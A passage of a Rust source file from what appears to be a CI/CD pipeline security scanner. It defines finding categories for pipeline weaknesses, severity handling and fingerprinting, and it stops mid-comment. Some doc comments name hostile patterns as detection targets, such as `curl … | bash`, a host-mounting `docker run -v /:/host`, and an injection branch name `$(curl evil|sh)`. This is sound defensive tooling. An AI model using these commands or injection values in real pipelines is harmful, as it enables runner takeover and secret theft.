taudit_core/finding.rs
1use crate::graph::{AuthorityGraph, NodeId, NodeKind};
2use crate::propagation::PropagationPath;
3use serde::{Deserialize, Serialize};
4use sha2::{Digest, Sha256};
5use std::path::PathBuf;
6
7// ── Finding-output enhancements (v0.10) ────────────────────────────
8//
9// The blue-team corpus defense report (Section 3) recommends a small
10// set of additive `Finding` fields that consumers (SIEMs, dashboards,
11// triage queues) need but cannot derive cheaply. They are:
12//
13// * `finding_group_id` — stable UUID v5 over (namespace, fingerprint)
14// so N hops against one secret cluster into
15// a single advisory in downstream tooling.
16// * `time_to_fix` — coarse remediation effort enum so triage
17// dashboards can sort by severity * effort.
18// * `compensating_controls` — human-readable list of detected controls
19// that downgraded the finding's severity.
20// * `suppressed` — set by the `.taudit-suppressions.yml`
21// applicator; preserves audit trail when a
22// finding has been waived rather than fixed.
23// * `original_severity` — pre-downgrade severity; populated whenever
24// the suppression applicator OR a compensating
25// control modifies `severity`.
26// * `suppression_reason` — operator-supplied justification from the
27// matching `.taudit-suppressions.yml` entry.
28//
29// All six fields live on `FindingExtras` and are flattened into JSON / SARIF
30// output via `#[serde(flatten)]`. New rules can populate them via
31// `Finding::with_time_to_fix(...)` / `Finding::with_compensating_controls(...)`
32// without touching the 31+ existing rule sites.
33
34#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
35#[serde(rename_all = "snake_case")]
36pub enum Severity {
37 Critical,
38 High,
39 Medium,
40 Low,
41 Info,
42}
43
44impl Severity {
45 fn rank(self) -> u8 {
46 match self {
47 Severity::Critical => 0,
48 Severity::High => 1,
49 Severity::Medium => 2,
50 Severity::Low => 3,
51 Severity::Info => 4,
52 }
53 }
54}
55
56impl Ord for Severity {
57 fn cmp(&self, other: &Self) -> std::cmp::Ordering {
58 self.rank().cmp(&other.rank())
59 }
60}
61
62impl PartialOrd for Severity {
63 fn partial_cmp(&self, other: &Self) -> Option<std::cmp::Ordering> {
64 Some(self.cmp(other))
65 }
66}
67
68/// MVP categories (1-5) are derivable from pipeline YAML alone.
69/// Stretch categories (6-9) need heuristics or metadata enrichment.
70#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
71#[serde(rename_all = "snake_case")]
72pub enum FindingCategory {
73 // MVP
74 AuthorityPropagation,
75 OverPrivilegedIdentity,
76 UnpinnedAction,
77 UntrustedWithAuthority,
78 ArtifactBoundaryCrossing,
79 // Stretch — implemented
80 FloatingImage,
81 LongLivedCredential,
82 /// Credential written to disk by a step (e.g. `persistCredentials: true` on a checkout).
83 /// Disk-persisted credentials are accessible to all subsequent steps and any process
84 /// with filesystem access, unlike runtime-only `HasAccessTo` authority.
85 PersistedCredential,
86 /// Dangerous trigger type (pull_request_target / pr) combined with secret/identity access.
87 TriggerContextMismatch,
88 /// Authority (secret/identity) flows into an opaque external workflow via DelegatesTo.
89 CrossWorkflowAuthorityChain,
90 /// Circular DelegatesTo chain — workflow calls itself transitively.
91 AuthorityCycle,
92 /// Privileged workflow (OIDC/broad identity) with no provenance attestation step.
93 UpliftWithoutAttestation,
94 /// Step writes to the environment gate ($GITHUB_ENV, pipeline variables) — authority can propagate.
95 SelfMutatingPipeline,
96 /// PR-triggered pipeline checks out the repository — attacker-controlled fork code lands on the runner.
97 CheckoutSelfPrExposure,
98 /// ADO variable group consumed by a PR-triggered job, crossing trust boundary.
99 VariableGroupInPrJob,
100 /// Self-hosted agent pool used in a PR-triggered job that also checks out the repository.
101 SelfHostedPoolPrHijack,
102 /// Broad-scope ADO service connection reachable from a PR-triggered job without OIDC.
103 ServiceConnectionScopeMismatch,
104 /// ADO `resources.repositories[]` entry referenced by an `extends:`,
105 /// `template: x@alias`, or `checkout: alias` consumer resolves with no
106 /// `ref:` (default branch) or a mutable branch ref (`refs/heads/<name>`).
107 /// Whoever owns that branch can inject steps into the consuming pipeline.
108 TemplateExtendsUnpinnedBranch,
109 /// ADO `resources.repositories[]` entry pinned to a feature-class branch
110 /// (anything outside the `main` / `master` / `release/*` / `hotfix/*`
111 /// platform set). Feature branches typically have weaker push protection
112 /// than the trunk, so any developer with write access to that branch can
113 /// inject pipeline YAML that runs with the consumer's authority. Strictly
114 /// stronger signal than `template_extends_unpinned_branch` — co-fires.
115 TemplateRepoRefIsFeatureBranch,
116 /// Pipeline step uses an Azure VM remote-exec primitive (Set-AzVMExtension /
117 /// CustomScriptExtension, Invoke-AzVMRunCommand, az vm run-command, az vm extension set)
118 /// where the executed command line interpolates a pipeline secret or a SAS token —
119 /// pipeline-to-VM lateral movement primitive logged in plaintext to the VM and ARM.
120 VmRemoteExecViaPipelineSecret,
121 /// A SAS token freshly minted in-pipeline is interpolated into a CLI argument
122 /// (commandToExecute / scriptArguments / --arguments / -ArgumentList) instead of
123 /// passed via env var or stdin — argv ends up in /proc/*/cmdline, ETW, ARM status.
124 ShortLivedSasInCommandLine,
125 /// Pipeline secret value assigned to a shell variable inside an inline
126 /// script (`export VAR=$(SECRET)`, `$X = "$(SECRET)"`). Once the value
127 /// transits a shell variable, ADO's `$(SECRET)` log mask no longer
128 /// applies — transcripts (`Start-Transcript`, `bash -x`, terraform debug
129 /// logs) print the cleartext.
130 SecretToInlineScriptEnvExport,
131 /// Pipeline secret value written to a file under the agent workspace
132 /// (`$(System.DefaultWorkingDirectory)`, `$(Build.SourcesDirectory)`,
133 /// or relative paths) without `secureFile` task or chmod 600. The file
134 /// persists in the agent workspace and is uploaded by
135 /// `PublishPipelineArtifact` and crawlable by later steps.
136 SecretMaterialisedToWorkspaceFile,
137 /// PowerShell pulls a Key Vault secret with `-AsPlainText` (or
138 /// `ConvertFrom-SecureString -AsPlainText`, or older
139 /// `.SecretValueText` syntax) into a non-`SecureString` variable. The
140 /// value never traverses the ADO variable-group boundary, so verbose
141 /// Az/PS logging and error stack traces print the credential.
142 ///
143 /// Rule id is `keyvault_secret_to_plaintext` (single token "keyvault")
144 /// rather than the snake_case derivation `key_vault_…` — matches the
145 /// docs filename and the convention used in the corpus evidence.
146 #[serde(rename = "keyvault_secret_to_plaintext")]
147 KeyVaultSecretToPlaintext,
148 /// `terraform apply -auto-approve` against a production-named service connection
149 /// without an environment approval gate.
150 TerraformAutoApproveInProd,
151 /// `AzureCLI@2` task with `addSpnToEnvironment: true` AND an inline script —
152 /// the script can launder federated SPN/OIDC tokens into pipeline variables.
153 AddSpnWithInlineScript,
154 /// A `type: string` pipeline parameter (no `values:` allowlist) is interpolated
155 /// via `${{ parameters.X }}` into an inline shell/PowerShell script body —
156 /// shell injection vector for anyone with "queue build".
157 ParameterInterpolationIntoShell,
158 /// A `run:` block fetches a remote script from a mutable URL (`refs/heads/`,
159 /// `/main/`, `/master/`) and pipes it directly to a shell interpreter
160 /// (`curl … | bash`, `wget … | sh`, `bash <(curl …)`, `deno run https://…`).
161 /// Whoever controls that URL's content controls execution on the runner.
162 RuntimeScriptFetchedFromFloatingUrl,
163 /// Workflow trigger combines high-authority PR events
164 /// (`pull_request_target`, `issue_comment`, or `workflow_run`) with a step
165 /// whose `uses:` ref is a mutable branch/tag (not a 40-char SHA). Compromise
166 /// of the action's default branch yields full repo write on the target repo.
167 PrTriggerWithFloatingActionRef,
168 /// A `workflow_run`-triggered workflow captures a value from an external
169 /// API response (`gh pr view`, `gh api`, `curl api.github.com`) and writes
170 /// it into `$GITHUB_ENV`/`$GITHUB_OUTPUT`/`$GITHUB_PATH` without sanitisation.
171 /// A poisoned API field (branch name, title) injects environment variables
172 /// into every subsequent step in the same job.
173 UntrustedApiResponseToEnvSink,
174 /// A `pull_request`-triggered workflow logs into a container registry via a
175 /// floating (non-SHA-pinned) login action. The compromised action receives
176 /// OIDC tokens or registry credentials, and the workflow then pushes a
177 /// PR-controlled image to a shared registry.
178 PrBuildPushesImageWithFloatingCredentials,
179 /// First-party step writes a Secret/Identity-derived value into the
180 /// `$GITHUB_ENV` gate (or pipeline-variable equivalent) and a *later*
181 /// step in the same job that runs in `Untrusted` or `ThirdParty` trust
182 /// zone reads from the runner-managed env (`${{ env.X }}`). The two
183 /// component rules — `self_mutating_pipeline` (writer) and
184 /// `untrusted_with_authority` (consumer) — each see only half the
185 /// chain and emit no finding for the laundered consumer; this rule
186 /// closes the composition gap that R2 attack #3 exploited.
187 SecretViaEnvGateToUntrustedConsumer,
188 /// Positive-invariant rule (GHA): the workflow declares neither a
189 /// top-level nor a per-job `permissions:` block, leaving GITHUB_TOKEN at
190 /// its broad platform default. Fires once per workflow file.
191 NoWorkflowLevelPermissionsBlock,
192 /// Positive-invariant rule (ADO): a job referencing a production-named
193 /// service connection has no `environment:` binding, so it bypasses the
194 /// only ADO-side approval gate regardless of whether `-auto-approve` is
195 /// present. Strictly broader than `terraform_auto_approve_in_prod`.
196 ProdDeployJobNoEnvironmentGate,
197 /// Positive-invariant rule (cross-platform): a long-lived static
198 /// credential is in scope but the workflow does not currently use any
199 /// OIDC identity even though the target cloud supports federation.
200 /// Advisory uplift on top of `long_lived_credential` that wires the
201 /// existing `Recommendation::FederateIdentity` variant.
202 LongLivedSecretWithoutOidcRecommendation,
203 /// Positive-invariant rule (GHA): a PR-triggered workflow has multiple
204 /// privileged jobs where SOME have the standard fork-check `if:` and
205 /// OTHERS do not. Detects an intra-file inconsistency in defensive
206 /// posture — the org has the right instinct but applied it unevenly.
207 PullRequestWorkflowInconsistentForkCheck,
208 /// Positive-invariant rule (GitLab): a job with a production-named
209 /// `environment:` binding has no `rules:` / `only:` clause restricting
210 /// it to protected branches. Deploy job runs (or attempts to run) on
211 /// every pipeline trigger.
212 GitlabDeployJobMissingProtectedBranchOnly,
213 /// Two-step ADO chain: an inline script captures a `terraform output`
214 /// value (literal `terraform output` CLI invocation or a `$env:TF_OUT_*` /
215 /// `$TF_OUT_*` env var sourced from a Terraform CLI task) AND emits a
216 /// `##vso[task.setvariable variable=X;...]` directive setting that
217 /// captured value into pipeline variable `X`. A subsequent step in the
218 /// same job then expands `$(X)` in shell-expansion position
219 /// (`bash -c "..."`, `eval`, command substitution `$(...)`, PowerShell
220 /// `-split` / `Invoke-Command` / `Invoke-Expression`/`iex`, or as an
221 /// unquoted command word). The `task.setvariable` hop launders
222 /// attacker-controlled Terraform state — sourced from a remote backend
223 /// (S3 bucket, Azure Storage) that often has weaker access controls than
224 /// the pipeline itself — through pipeline-variable space and into a
225 /// shell interpreter.
226 TerraformOutputViaSetvariableShellExpansion,
227 /// GHA workflow declares a high-blast-radius trigger (`issue_comment`,
228 /// `pull_request_review`, `pull_request_review_comment`, `workflow_run`)
229 /// alongside write permissions or non-`GITHUB_TOKEN` secrets. Closes the
230 /// gap left by `trigger_context_mismatch` only firing on
231 /// `pull_request_target` / ADO `pr`.
232 RiskyTriggerWithAuthority,
233 /// A `jobs.<id>.outputs.<name>` value is sourced from `secrets.*`, an
234 /// OIDC-bearing step output, or has a credential-shaped name. Job outputs
235 /// flow unmasked through `needs.<job>.outputs.*` and are written to the
236 /// run log — masking is heuristic, never authoritative.
237 SensitiveValueInJobOutput,
238 /// A `workflow_dispatch.inputs.*` value flows into `curl` / `wget` /
239 /// `gh api` / a `run:` URL / `actions/checkout` `ref:`. Anyone with
240 /// dispatch permission can pivot the run to attacker-controlled refs or
241 /// hosts.
242 ManualDispatchInputToUrlOrCommand,
243 /// A reusable workflow call uses `secrets: inherit` while the caller is
244 /// triggered by an attacker-influenced event (`pull_request`,
245 /// `pull_request_target`, `issue_comment`, `workflow_run`). The whole
246 /// caller secret bag forwards to the callee regardless of what the callee
247 /// actually consumes — every transitive `uses:` in the called workflow
248 /// inherits the same scope.
249 SecretsInheritOverscopedPassthrough,
250 /// A `workflow_run`- or `pull_request_target`-triggered consumer
251 /// downloads an artifact from the originating run AND interprets that
252 /// artifact's content into a privileged sink (post-to-comment, write to
253 /// `$GITHUB_ENV`, `eval`, …). The producer ran in PR context, so a
254 /// malicious PR can write arbitrary content into the artifact while the
255 /// consumer holds upstream-repo authority.
256 UnsafePrArtifactInWorkflowRunConsumer,
257 /// A GitHub Actions `run:` block (or `actions/github-script` `script:` body)
258 /// interpolates an attacker-controllable expression — `${{ github.event.* }}`,
259 /// `${{ github.head_ref }}`, or `${{ inputs.* }}` from a privileged trigger
260 /// (`workflow_dispatch` / `workflow_run` / `issue_comment`) — directly into
261 /// the script text without first binding through an `env:` indirection.
262 /// Classic GitHub Actions remote-code-execution pattern.
263 ScriptInjectionViaUntrustedContext,
264 /// A workflow that holds non-`GITHUB_TOKEN` secrets or non-default
265 /// write permissions includes a step that uses an interactive debug action
266 /// (mxschmitt/action-tmate, lhotari/action-upterm, actions/tmate, …).
267 /// A maintainer flipping `debug_enabled=true` publishes the runner's full
268 /// environment over an external SSH endpoint.
269 InteractiveDebugActionInAuthorityWorkflow,
270 /// An `actions/cache` step keys the cache on a PR-derived expression
271 /// (`github.head_ref`, `github.event.pull_request.head.ref`, `github.actor`)
272 /// in a workflow that ALSO runs on `push: branches: [main]` — a PR can
273 /// poison the cache that the default-branch build later restores.
274 PrSpecificCacheKeyInDefaultBranchConsumer,
275 /// A `run:` step uses `gh ` / `gh api` with the default `GITHUB_TOKEN` to
276 /// perform a write-class action (`pr merge`, `release create/upload`,
277 /// `api -X POST/PATCH/PUT/DELETE` to `/repos/.../{contents,releases,actions/secrets,environments}`)
278 /// inside a workflow triggered by `pull_request`, `issue_comment`, or
279 /// `workflow_run` — runtime privilege escalation that static permission
280 /// checks miss.
281 GhCliWithDefaultTokenEscalating,
282 /// GitLab CI `$CI_JOB_TOKEN` (or `gitlab-ci-token:$CI_JOB_TOKEN`) used as a
283 /// bearer credential against an external HTTP API or fed to `docker login`
284 /// for `registry.gitlab.com`. CI_JOB_TOKEN's default scope (registry write,
285 /// package upload, project read) means a poisoned MR job that emits the
286 /// token to a webhook can pivot to package/registry pushes elsewhere.
287 CiJobTokenToExternalApi,
288 /// GitLab CI `id_tokens:` declares an `aud:` audience that is reused across
289 /// MR-context and protected-context jobs (no audience separation), or is a
290 /// wildcard / multi-cloud broker URL. The audience is what trades for
291 /// downstream cloud creds — a single shared `aud` means any job that
292 /// compromises the token assumes the most-privileged role any other job
293 /// uses.
294 IdTokenAudienceOverscoped,
295 /// Direct shell interpolation of attacker-controlled GitLab predefined
296 /// vars (`$CI_COMMIT_BRANCH`, `$CI_COMMIT_REF_NAME`, `$CI_COMMIT_TAG`,
297 /// `$CI_COMMIT_MESSAGE`, `$CI_COMMIT_TITLE`, `$CI_MERGE_REQUEST_TITLE`,
298 /// `$CI_MERGE_REQUEST_DESCRIPTION`,
299 /// `$CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`, `$CI_COMMIT_AUTHOR`) into
300 /// `script:` / `before_script:` / `after_script:` / `environment:url:`
301 /// without single-quote isolation. A branch named `` $(curl evil|sh) ``
302 /// executes inside the runner. GitLab generalisation of the GHA
303 /// `script_injection_via_untrusted_context` class.
304 UntrustedCiVarInShellInterpolation,
305 /// A GitLab `include:` references (a) a `remote:` URL pointing at a
306 /// branch (`/-/raw/<branch>/...`), (b) a `project:` with `ref:` resolving
307 /// to a mutable branch name (main/master/develop), or (c) an include with
308 /// no `ref:` at all (defaults to HEAD). Whoever owns that branch can
309 /// backdoor every consumer's pipeline silently — included YAML executes
310 /// with the consumer's secrets and CI_JOB_TOKEN.
311 UnpinnedIncludeRemoteOrBranchRef,
312 /// A GitLab job declares a `services: [docker:*-dind]` sidecar AND holds
313 /// at least one non-CI_JOB_TOKEN secret (registry creds, deploy keys,
314 /// signing keys, vault id_tokens). docker-in-docker exposes the full
315 /// Docker socket inside the job container — a malicious build step can
316 /// `docker run -v /:/host` from inside dind and read the runner host
317 /// filesystem (other jobs' artifacts, cached creds).
318 DindServiceGrantsHostAuthority,
319 /// A GitLab job whose name or `extends:` matches scanner patterns
320 /// (`sast`, `dast`, `secret_detection`, `dependency_scanning`,
321 /// `container_scanning`, `gitleaks`, `trivy`, `grype`, `semgrep`, etc.)
322 /// runs with `allow_failure: true` AND has no `rules:` clause that
323 /// surfaces the failure. The pipeline goes green even when the scan
324 /// errors out — silent-pass is worse than no scan because reviewers trust
325 /// the badge.
326 SecurityJobSilentlySkipped,
327 /// A GitLab `trigger:` job (downstream / child pipeline) runs in
328 /// `merge_request_event` context OR uses `include: artifact:` from a
329 /// previous job (dynamic child pipeline). Dynamic child pipelines are a
330 /// code-injection sink — anything the build step writes to the artifact
331 /// runs as a real pipeline with the parent project's secrets.
332 ChildPipelineTriggerInheritsAuthority,
333 /// A GitLab `cache:` declaration whose `key:` is hardcoded, `$CI_JOB_NAME`
334 /// only, or `$CI_COMMIT_REF_SLUG` without a `policy: pull` restriction.
335 /// Caches are stored per-runner keyed by `key:`; a poisoned MR can push a
336 /// malicious `node_modules/` cache that the next default-branch job
337 /// downloads and executes during `npm install`.
338 CacheKeyCrossesTrustBoundary,
339 /// A CI script constructs an HTTPS git URL with embedded credentials
340 /// (`https://user:$TOKEN@host/...`) before invoking `git clone`,
341 /// `git push`, or `git remote set-url`. The credential is exposed
342 /// in the process argv (visible to `ps`, `/proc/*/cmdline`), persists
343 /// in `.git/config` for the rest of the job, and may be uploaded as
344 /// part of any artifact that bundles the workspace.
345 PatEmbeddedInGitRemoteUrl,
346 /// A CI job triggers a different project's pipeline via the GitLab
347 /// REST API using `CI_JOB_TOKEN` and forwards user-influenced variables
348 /// through the `variables[KEY]=value` query/form parameter. The
349 /// downstream project's security depends on the trust contract between
350 /// the two projects — variable values flowing across that boundary
351 /// constitute a cross-project authority bridge.
352 CiTokenTriggersDownstreamWithVariablePassthrough,
353 /// A GitLab job emits an `artifacts.reports.dotenv: <file>` artifact
354 /// whose contents become pipeline variables for any consumer linked
355 /// via `needs:` or `dependencies:`. A consumer in a later stage that
356 /// targets a production-named environment inherits those variables
357 /// transparently — no explicit download is visible at the job level.
358 /// When the producer reads attacker-influenced inputs (branch names,
359 /// commit messages), the dotenv flow is a covert privilege escalation
360 /// channel into the deployment job.
361 DotenvArtifactFlowsToPrivilegedDeployment,
362 // Reserved — requires ADO/GH API enrichment beyond pipeline YAML
363 /// Requires runtime network telemetry or policy enrichment — not detectable from YAML alone.
364 #[doc(hidden)]
365 EgressBlindspot,
366 /// Requires external audit-sink configuration data — not detectable from YAML alone.
367 #[doc(hidden)]
368 MissingAuditTrail,
369}
370
371/// Routing: scope findings -> TsafeRemediation; isolation findings -> CellosRemediation.
372#[derive(Debug, Clone, Serialize, Deserialize)]
373#[serde(tag = "type", rename_all = "snake_case")]
374pub enum Recommendation {
375 TsafeRemediation {
376 command: String,
377 explanation: String,
378 },
379 CellosRemediation {
380 reason: String,
381 spec_hint: String,
382 },
383 PinAction {
384 current: String,
385 pinned: String,
386 },
387 ReducePermissions {
388 current: String,
389 minimum: String,
390 },
391 FederateIdentity {
392 static_secret: String,
393 oidc_provider: String,
394 },
395 Manual {
396 action: String,
397 },
398}
399
400/// Provenance of a finding — distinguishes findings emitted by built-in
401/// taudit rules from findings emitted by user-loaded custom invariant YAML
402/// (`--invariants-dir`). Custom rules can emit arbitrarily-worded findings
403/// at any severity, so an operator piping output into a JIRA workflow or
404/// SARIF upload needs a non-spoofable signal of which file the rule came
405/// from. Serializes as `"built-in"` (string) for built-in findings and
406/// `{"custom": "<path>"}` for custom-rule findings — see
407/// `docs/finding-fingerprint.md` for the contract.
408#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
409#[serde(rename_all = "snake_case")]
410pub enum FindingSource {
411 /// Emitted by a built-in rule defined in `taudit-core::rules`. The
412 /// authoritative trust anchor — the binary's release commit defines the
413 /// rule logic. Serialises as the kebab-case string `"built-in"` to match
414 /// `schemas/finding.v1.json`.
415 #[default]
416 #[serde(rename = "built-in")]
417 BuiltIn,
418 /// Emitted by a custom invariant rule loaded from the given YAML file.
419 /// The path is the file the rule was loaded from, retained so operators
420 /// can audit which file produced any given finding.
421 Custom { source_file: PathBuf },
422}
423
424impl FindingSource {
425 /// True for findings emitted by built-in rules.
426 pub fn is_built_in(&self) -> bool {
427 matches!(self, FindingSource::BuiltIn)
428 }
429}
430
431/// Coarse-grained remediation effort. Surfaces in JSON `time_to_fix` and SARIF
432/// `properties.timeToFix` so triage dashboards can sort by `severity * effort`.
433///
434/// The four buckets are deliberately wide. Precise time estimates would invite
435/// argument; the buckets exist to separate "flip a flag" from "rewrite a job"
436/// from "renegotiate ops policy".
437///
438/// Per `MEMORY/.../blueteam-corpus-defense.md` Section 3 / Enhancement E-3.
439#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
440#[serde(rename_all = "snake_case")]
441pub enum FixEffort {
442 /// ~5 minutes. Mechanical change to a single file (flip a flag, pin a SHA,
443 /// add a `permissions: {}` block). No structural risk.
444 Trivial,
445 /// ~1 hour. Refactor a step or job: split a script, add a fork-check,
446 /// move a secret to an environment binding.
447 Small,
448 /// ~1 day. Restructure a job or pipeline: introduce an environment gate,
449 /// move from inline scripts to a sandboxed action, add an OIDC role.
450 Medium,
451 /// ~1 week or more. Operational policy change: migrate from PATs to OIDC
452 /// across an org, change branch protection model, retire a service principal.
453 Large,
454}
455
456/// Optional finding metadata. Lives on every `Finding` via
457/// `#[serde(flatten)]` so consumers see the fields at the top of the
458/// finding object — same place they'd appear if declared inline on
459/// `Finding`. Default-constructed extras serialize to nothing (all
460/// `Option::None` and empty `Vec`s skip-serialize), so existing
461/// snapshots remain byte-stable until a rule populates a field.
462///
463/// **Why a wrapper struct?** The 30+ rule call sites use struct
464/// literal syntax. Adding fields directly to `Finding` would force
465/// every site to edit. With `extras: FindingExtras::default()`, new
466/// extras can be added in a single place.
467#[derive(Debug, Clone, Default, Serialize, Deserialize)]
468pub struct FindingExtras {
469 /// Stable UUID v5 over `(NAMESPACE, fingerprint)` — collapses
470 /// per-hop findings against the same authority root into one group
471 /// for SIEM display. See `compute_finding_group_id`.
472 #[serde(default, skip_serializing_if = "Option::is_none")]
473 pub finding_group_id: Option<String>,
474
475 /// Coarse remediation effort. See `FixEffort`.
476 #[serde(default, skip_serializing_if = "Option::is_none")]
477 pub time_to_fix: Option<FixEffort>,
478
479 /// Human-readable list of controls that already neutralise (or partially
480 /// neutralise) this finding — populated when a compensating-control
481 /// detector downgrades severity. Empty when no downgrade applied.
482 #[serde(default, skip_serializing_if = "Vec::is_empty")]
483 pub compensating_controls: Vec<String>,
484
485 /// Set to `true` by the suppression applicator when a matching
486 /// `.taudit-suppressions.yml` entry exists AND the configured mode
487 /// is `Suppress`. The finding still appears in output (audit trail
488 /// preserved) but consumers can filter on this field.
489 #[serde(default, skip_serializing_if = "is_false")]
490 pub suppressed: bool,
491
492 /// Original pre-downgrade severity. Populated by the suppression
493 /// applicator OR a compensating-control detector when `severity`
494 /// is mutated. `None` means the current severity is the rule-emitted
495 /// value.
496 #[serde(default, skip_serializing_if = "Option::is_none")]
497 pub original_severity: Option<Severity>,
498
499 /// Operator-supplied justification from the matching suppression
500 /// entry. `None` when no suppression applies.
501 #[serde(default, skip_serializing_if = "Option::is_none")]
502 pub suppression_reason: Option<String>,
503}
504
505#[allow(clippy::trivially_copy_pass_by_ref)]
506fn is_false(b: &bool) -> bool {
507 !*b
508}
509
510/// A finding is a concrete, actionable authority issue.
511#[derive(Debug, Clone, Serialize, Deserialize)]
512pub struct Finding {
513 pub severity: Severity,
514 pub category: FindingCategory,
515 #[serde(skip_serializing_if = "Option::is_none")]
516 pub path: Option<PropagationPath>,
517 pub nodes_involved: Vec<NodeId>,
518 pub message: String,
519 pub recommendation: Recommendation,
520 /// Provenance of this finding. Defaults to `BuiltIn` for backward
521 /// compatibility with code/JSON that predates the field — every
522 /// in-tree built-in rule sets this explicitly. Deserialization of older
523 /// JSON without the field treats the finding as built-in.
524 #[serde(default)]
525 pub source: FindingSource,
526 /// Optional metadata (group id, time-to-fix, compensating controls,
527 /// suppression markers). Flattens into the JSON object so consumers
528 /// see top-level fields — see `FindingExtras` for individual semantics.
529 #[serde(flatten, default)]
530 pub extras: FindingExtras,
531}
532
533impl Finding {
534 /// Builder helper: attach a `time_to_fix` annotation to this finding.
535 /// Call sites: `let f = Finding { ... }.with_time_to_fix(FixEffort::Trivial);`
536 pub fn with_time_to_fix(mut self, effort: FixEffort) -> Self {
537 self.extras.time_to_fix = Some(effort);
538 self
539 }
540
541 /// Builder helper: append a compensating control description and
542 /// downgrade severity by one tier (Critical -> High -> Medium -> Low -> Info).
543 /// Records the original severity so the audit trail survives.
544 pub fn with_compensating_control(mut self, control: impl Into<String>) -> Self {
545 let original = self.severity;
546 self.extras.compensating_controls.push(control.into());
547 self.severity = downgrade_severity(self.severity);
548 if self.extras.original_severity.is_none() {
549 self.extras.original_severity = Some(original);
550 }
551 self
552 }
553}
554
555/// Move severity one rank toward `Info` (Critical -> High -> ... -> Info).
556/// `Info` stays `Info`. Used by both the suppression applicator and
557/// compensating-control detectors.
558pub fn downgrade_severity(s: Severity) -> Severity {
559 match s {
560 Severity::Critical => Severity::High,
561 Severity::High => Severity::Medium,
562 Severity::Medium => Severity::Low,
563 Severity::Low => Severity::Info,
564 Severity::Info => Severity::Info,
565 }
566}
567
568/// Stable UUID v5 over the finding fingerprint. Two findings whose
569/// fingerprints match (same rule + file + root authority) produce the
570/// same `finding_group_id` — that is the whole point: SIEMs and triage
571/// dashboards collapse N hops against a single secret into one row.
572///
573/// The UUID v5 namespace is a fixed UUID v4 derived once and embedded
574/// here. Treating the namespace as load-bearing is intentional: any
575/// future change here would break every consumer that has stored a
576/// `finding_group_id`. Bump only at a major version.
577pub fn compute_finding_group_id(fingerprint: &str) -> String {
578 // UUID v5 = SHA-1(namespace || name), with version + variant bits set.
579 // Implemented inline so taudit-core stays free of the `uuid` crate
580 // dependency (workspace already depends on it from the CLI; core
581 // remains zero-IO and minimal).
582 const NAMESPACE: [u8; 16] = [
583 0x6c, 0x6f, 0xd0, 0xa3, 0x82, 0x44, 0x4f, 0x29, 0xb1, 0x9a, 0x09, 0xc8, 0x7e, 0x49, 0x55,
584 0x21,
585 ];
586
587 use sha1::{Digest as Sha1Digest, Sha1};
588 let mut hasher = Sha1::new();
589 Sha1Digest::update(&mut hasher, NAMESPACE);
590 Sha1Digest::update(&mut hasher, fingerprint.as_bytes());
591 let hash = hasher.finalize();
592
593 let mut bytes = [0u8; 16];
594 bytes.copy_from_slice(&hash[..16]);
595 // RFC 4122 §4.3: set version to 5 (bits 12-15 of time_hi_and_version)
596 bytes[6] = (bytes[6] & 0x0f) | 0x50;
597 // RFC 4122 §4.4: set variant to RFC 4122 (bits 6-7 of clock_seq_hi)
598 bytes[8] = (bytes[8] & 0x3f) | 0x80;
599
600 format!(
601 "{:02x}{:02x}{:02x}{:02x}-{:02x}{:02x}-{:02x}{:02x}-{:02x}{:02x}-{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}",
602 bytes[0], bytes[1], bytes[2], bytes[3],
603 bytes[4], bytes[5],
604 bytes[6], bytes[7],
605 bytes[8], bytes[9],
606 bytes[10], bytes[11], bytes[12], bytes[13], bytes[14], bytes[15],
607 )
608}
609
610// ── Finding fingerprint ────────────────────────────────────
611//
612// Stable cross-run identifier for a finding. Surfaces in:
613//
614// * SARIF `partialFingerprints[primaryLocationLineHash]`
615// * JSON `findings[].fingerprint`
616// * CloudEvents extension attribute `tauditfindingfingerprint`
617//
618// SIEMs / suppression DBs / dedup pipelines key on this value to
619// recognise "same finding seen on previous run". See
620// `docs/finding-fingerprint.md` for the full contract.
621
622/// Pull a custom-rule id out of a finding message of the form
623/// `[<id>] rest of message`. Returns `None` if the message does not start
624/// with a bracketed id. Mirrors the matching helper in
625/// `taudit-report-sarif`; kept private so the surface stays minimal.
626fn extract_custom_rule_id(message: &str) -> Option<&str> {
627 if !message.starts_with('[') {
628 return None;
629 }
630 let end = message.find(']')?;
631 let id = &message[1..end];
632 if id.is_empty() {
633 None
634 } else {
635 Some(id)
636 }
637}
638
639/// Snake-case rule id derived from a `FindingCategory`. Delegates to
640/// serde so the value tracks the serialized form across renames.
641fn category_rule_id(category: &FindingCategory) -> String {
642 serde_json::to_value(category)
643 .ok()
644 .and_then(|v| v.as_str().map(str::to_string))
645 .unwrap_or_else(|| "unknown".to_string())
646}
647
648/// Public, stable rule-id resolver for a finding.
649///
650/// Returns the snake_case rule id reported alongside this finding. When the
651/// finding's message starts with a bracketed custom-rule prefix
652/// (`[my_rule] ...`), the bracketed id wins so custom YAML rules surface
653/// their declared id. Otherwise the rule id is the snake_case form of the
654/// finding's `category` (the same string serde uses to serialize the
655/// category enum).
656///
657/// JSON, SARIF, and CloudEvents emitters all share this helper to ensure
658/// the `rule_id` field is identical across the three sinks.
659pub fn rule_id_for(finding: &Finding) -> String {
660 extract_custom_rule_id(&finding.message)
661 .map(str::to_string)
662 .unwrap_or_else(|| category_rule_id(&finding.category))
663}
664
665/// Compute a stable cross-run fingerprint for a finding.
666///
667/// The fingerprint identifies "the same logical issue" across re-runs and
668/// across non-cosmetic edits to the surrounding pipeline. Two runs against
669/// the same input file produce the same fingerprint; a fix to the
670/// underlying issue makes the fingerprint disappear; a tweak to the
671/// finding's user-facing message does NOT change the fingerprint.
672///
673/// **Algorithm version `v2`** (replaces v1 from v0.9.1).
674///
675/// v1 collapsed every per-hop finding against the same root Secret/Identity
676/// onto a single fingerprint. That hides genuinely distinct issues — two
677/// untrusted steps reaching the same secret are two separate
678/// remediation-distinct findings, not one. v2 makes every component of the
679/// finding contribute to the hash so unrelated findings cannot alias.
680///
681/// **Inputs (sensitive to):**
682/// * Rule id — either a custom rule id parsed from a `[id] …` message
683/// prefix, or the snake_case form of `finding.category`
684/// * Source file path (`graph.source.file`) — verbatim, never normalised
685/// to a basename, so two pipelines named the same file in different
686/// directories never collide
